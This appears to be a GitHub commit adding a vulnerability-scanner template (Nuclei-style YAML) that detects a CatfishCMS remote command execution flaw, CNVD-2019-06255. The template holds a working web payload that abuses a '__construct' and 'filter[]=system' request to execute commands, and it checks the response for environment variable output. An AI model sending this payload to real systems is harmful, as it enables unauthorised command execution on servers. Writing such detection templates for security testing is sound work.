Create CNVD-2019-06255.yaml

patch-1
Prince Chaddha 2021-10-25 16:24:44 +05:30 committed by GitHub
parent de3365c34c
commit 0c87175275
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 27 additions and 0 deletions

27
cnvd/CNVD-2019-06255.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CNVD-2019-06255
info:
name: CatfishCMS RCE
author: Lark-Lab
severity: medium
reference: http://112.124.31.29/%E6%BC%8F%E6%B4%9E%E5%BA%93/01-CMS%E6%BC%8F%E6%B4%9E/CatfishCMS/CNVD-2019-06255%20CatfishCMS%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/
tags: rce,cvnd,catfishcms
requests:
- method: GET
path:
- "{{BaseURL}}/s=set&_method=__construct&method=*&filter[]=system"
redirects: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'OS'
- 'PATH'
- 'SHELL'
- 'USER'
condition: and